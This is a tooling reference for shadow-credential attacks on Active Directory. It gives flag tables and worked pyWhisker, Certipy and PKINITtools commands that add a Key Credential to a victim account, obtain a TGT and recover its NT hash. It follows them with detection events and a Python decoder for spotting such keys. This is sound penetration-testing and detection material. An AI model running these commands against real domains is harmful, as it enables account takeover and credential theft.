Anthropic-Cybersecurity-Skills/skills/abusing-shadow-credentials-for-privesc/references/api-reference.md
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817)
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00


# Shadow Credentials Tooling Reference
Prerequisites common to all three tools: write access to the target's `msDS-KeyCredentialLink` attribute (GenericAll/GenericWrite on the object, or WriteProperty on that attribute) and domain controllers that support PKINIT key trust (Windows Server 2016 or later, holding a certificate usable for Kerberos authentication). Remove the added Key Credential when finished; `clear` also deletes legitimate keys such as Windows Hello for Business enrolments.
## pyWhisker (https://github.com/ShutdownRepo/pywhisker)
Invocation: `python3 pywhisker.py [auth] --target <obj> --action <action> [opts]`
| Flag | Meaning |
|------|---------|
| `-d DOMAIN` | Target domain (FQDN) |
| `-u USER` | Controlled username |
| `-p PASSWORD` | Password |
| `-k` / `--use-kerberos` | Kerberos auth using the ccache in `KRB5CCNAME`; add `--no-pass` to skip the password prompt |
| `-H LM:NT` | Pass-the-hash (`--hashes`; the LM part may be omitted) |
| `-t` / `--target NAME` | Target user or computer account (trailing `$` for computers) whose `msDS-KeyCredentialLink` is modified |
| `-a` / `--action list` | Enumerate existing Key Credentials |
| `--action add` | Generate a key pair and write a new Key Credential (prints the new Device ID and, for PFX output, its password) |
| `--action remove` | Remove one Key Credential by `--device-id` |
| `--action clear` | Remove all Key Credentials, including legitimate ones |
| `--action info` | Show details of the Key Credential selected by `--device-id` |
| `-f` / `--filename NAME` | Output PFX/PEM base name |
| `-e` / `--export {PEM,PFX}` | Output format (default PFX) |
| `-P` / `--pfx-password PW` | Password protecting the PFX (random and printed if not set) |
| `--device-id GUID` | Key Credential to act on for `remove` / `info` |
| `--dc-ip IP` | Domain Controller IP |
| `--use-ldaps` | Use LDAPS (636) |
### Example
```bash
# Write a new Key Credential to 'victim' and save the key pair as victim_shadow.pfx.
# Note the PFX password and the Device ID pyWhisker prints: the first is needed for
# PKINIT, the second for --action remove during cleanup.
python3 pywhisker.py -d corp.local -u attacker -p 'Passw0rd!' \
    --target victim --action add --filename victim_shadow
```
## Certipy `shadow` (https://github.com/ly4k/Certipy)
| Command | Meaning |
|---------|---------|
| `certipy shadow auto` | Add Key Credential → PKINIT TGT → UnPAC-the-hash (NT hash) → restore the original `msDS-KeyCredentialLink` value (end to end) |
| `certipy shadow add` | Add Key Credential only (saves the PFX; note the printed Device ID) |
| `certipy shadow list` | List Key Credentials |
| `certipy shadow remove` | Remove one Key Credential by `-device-id` |
| `certipy shadow clear` | Clear all Key Credentials, including legitimate ones |
| `certipy shadow info` | Show Key Credential info for `-device-id` |
Key flags: `-u USER@DOMAIN`, `-p PW` / `-hashes :NT` / `-k -no-pass`,
`-dc-ip IP`, `-account TARGET` (use trailing `$` for computers), `-ns IP`, `-dns-tcp`.
### Example
```bash
# End to end against the computer account WS01$: add a Key Credential, authenticate
# with PKINIT, recover the NT hash, then restore the original attribute value.
certipy shadow auto -u attacker@corp.local -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'WS01$'
```
## PKINITtools (https://github.com/dirkjanm/PKINITtools)
| Script | Purpose |
|--------|---------|
| `gettgtpkinit.py -cert-pfx FILE -pfx-pass PW DOMAIN/USER out.ccache` | Request a TGT via PKINIT with the shadow key; prints the AS-REP encryption key needed by the next step |
| `getnthash.py -key <AS-REP-KEY> DOMAIN/USER` | Recover the NT hash from the PAC via a U2U request (UnPAC-the-hash); needs `KRB5CCNAME` pointing at the ccache |
### Example
```bash
# 1. PKINIT with the shadow key; -pfx-pass is the password pyWhisker printed (or set with -P).
#    Copy the "AS-REP encryption key" line from the output.
python3 gettgtpkinit.py -cert-pfx victim_shadow.pfx -pfx-pass abc123 \
    corp.local/victim victim.ccache
# 2. Use the TGT to recover victim's NT hash (UnPAC-the-hash), passing the key from step 1.
export KRB5CCNAME=victim.ccache
python3 getnthash.py -key <AS-REP-KEY> corp.local/victim
```
## Detection signal
- Event ID 5136: modification of `msDS-KeyCredentialLink` (requires the Directory Service Changes audit subcategory and a SACL auditing writes on the object). The event carries the attribute value as a DN-Binary string, so the old and new Key Credentials can be compared.
- Event ID 4662 on the target object with `Properties` containing `5b47d60f-6090-40b2-9f37-2a4de88f3063` (the schema GUID of `msDS-KeyCredentialLink`) and a Write Property access.
- Event ID 4768 (TGT requested) with the Certificate Information fields populated (PKINIT) for an account that does not normally authenticate with a certificate.
- BloodHound edge: `AddKeyCredentialLink` (who can write the attribute on which principals).
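As an added example (not code from pyWhisker, Certipy or PKINITtools), the Python below decodes an `msDS-KeyCredentialLink` value as a 5136 event or an LDAP query hands it back: a DN-Binary string wrapping a KEYCREDENTIALLINK_BLOB (MS-ADTS 2.2.20), which is the structure the tools above write. It also applies two triage heuristics a responder can run over 5136 "value added" strings. The sample value is constructed in `build_sample_value()`; the DeviceID, DN and timestamp are made up, and both the GUID byte order and the "last logon equals creation time" heuristic are assumptions marked in the comments.

```python
"""Decode msDS-KeyCredentialLink values (MS-ADTS 2.2.20 KEYCREDENTIALLINK_BLOB).
Added example for this reference, not code from pyWhisker, Certipy or PKINITtools;
the value it parses is constructed by build_sample_value() below."""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6)
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, KEY_APPROX_LAST_LOGON, KEY_CREATION_TIME = 0x06, 0x07, 0x08, 0x09
KEY_USAGE_NGC = 0x01      # key-trust (Windows Hello) usage, the one the shadow-credential tools write
KEY_SOURCE_AD = 0x00
BLOB_VERSION = 0x200
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def datetime_to_filetime(dt):
    # timedelta // timedelta is exact integer math; floats lose precision at 1e16 ticks
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10

def parse_dn_binary(value):
    """Split an LDAP DN-Binary string 'B:<hex char count>:<hex>:<DN>' into (bytes, DN)."""
    parts = value.split(":", 3)
    if len(parts) != 4 or parts[0] != "B" or not parts[1].isdigit():
        raise ValueError("not a DN-Binary value")
    if int(parts[1]) != len(parts[2]):
        raise ValueError("DN-Binary length field does not match the hex payload")
    return bytes.fromhex(parts[2]), parts[3]

def parse_key_credential(blob):
    """Walk the (2-byte length, 1-byte identifier, data) entries of a KEYCREDENTIALLINK_BLOB."""
    if len(blob) < 4:
        raise ValueError("blob too short for a version header")
    version, = struct.unpack_from("<I", blob, 0)
    if version != BLOB_VERSION:
        raise ValueError(f"unsupported KeyCredentialLink version {version:#x}")
    fields, offset = {"version": version}, 4
    while offset < len(blob):
        if offset + 3 > len(blob):
            raise ValueError("truncated entry header")
        length, ident = struct.unpack_from("<HB", blob, offset)
        data = blob[offset + 3:offset + 3 + length]
        if len(data) != length:
            raise ValueError("truncated entry data")
        offset += 3 + length
        if ident == KEY_ID:
            fields["key_id"] = data.hex()             # SHA-256 of the key material
        elif ident == KEY_MATERIAL:
            fields["key_material_len"] = len(data)    # DER public key; only its size is kept here
        elif ident in (KEY_USAGE, KEY_SOURCE):
            fields["key_usage" if ident == KEY_USAGE else "key_source"] = data[0]
        elif ident == DEVICE_ID:
            # assumption: GUID stored in the mixed-endian layout .NET's Guid(byte[]) uses
            fields["device_id"] = str(uuid.UUID(bytes_le=data))
        elif ident in (KEY_APPROX_LAST_LOGON, KEY_CREATION_TIME):
            name = "last_logon" if ident == KEY_APPROX_LAST_LOGON else "creation_time"
            fields[name] = filetime_to_datetime(struct.unpack("<Q", data)[0])
    return fields

def triage(value, known_device_ids):
    """Findings for one 5136 'value added' string. Heuristics (assumptions): a DeviceID outside
    the known-device baseline, and an NGC key whose approximate-last-logon still equals its
    creation time (the tools write both as 'now'; the DC advances the former when the key is used)."""
    blob, dn = parse_dn_binary(value)
    kc = parse_key_credential(blob)
    findings = []
    if kc.get("device_id") not in known_device_ids:
        findings.append(f"{dn}: Key Credential with unknown DeviceID {kc.get('device_id')}")
    if kc.get("key_usage") == KEY_USAGE_NGC and kc.get("last_logon") == kc.get("creation_time"):
        findings.append(f"{dn}: NGC key created {kc['creation_time'].isoformat()}, never used")
    return kc, findings

def _entry(ident, data):
    return struct.pack("<HB", len(data), ident) + data

SAMPLE_DEVICE_ID = "7d4f1a3e-9c2b-4e61-8f0a-5b6c7d8e9f01"   # constructed
SAMPLE_DN = "CN=victim,CN=Users,DC=corp,DC=local"            # constructed
SAMPLE_CREATED = datetime(2026, 6, 22, 17, 8, 16, tzinfo=timezone.utc)

def build_sample_value(device_id=SAMPLE_DEVICE_ID, created=SAMPLE_CREATED, dn=SAMPLE_DN):
    """Constructed sample: one NGC key in the shape an 'add' writes (no real key material)."""
    public_key = b"\x30\x82\x01\x22" + bytes(286)   # stand-in for a 290-byte DER SubjectPublicKeyInfo
    ts = struct.pack("<Q", datetime_to_filetime(created))
    blob = struct.pack("<I", BLOB_VERSION)
    blob += _entry(KEY_ID, hashlib.sha256(public_key).digest()) + _entry(KEY_MATERIAL, public_key)
    blob += _entry(KEY_USAGE, bytes([KEY_USAGE_NGC])) + _entry(KEY_SOURCE, bytes([KEY_SOURCE_AD]))
    blob += _entry(DEVICE_ID, uuid.UUID(device_id).bytes_le)
    blob += _entry(KEY_APPROX_LAST_LOGON, ts) + _entry(KEY_CREATION_TIME, ts)
    hexstr = blob.hex().upper()
    return f"B:{len(hexstr)}:{hexstr}:{dn}"

SAMPLE_VALUE = build_sample_value()

if __name__ == "__main__":
    fields, findings = triage(SAMPLE_VALUE, known_device_ids=frozenset())
    print(fields)
    print("\n".join(findings))
```

Feed `triage()` the `Attribute Value` of each 5136 event where the LDAP display name is `msDS-KeyCredentialLink`, with a baseline of DeviceIDs taken from a known-good `--action list` / `certipy shadow list` run; a key with no matching device, or one that still shows no use since creation, is the artefact a `shadow add` leaves behind.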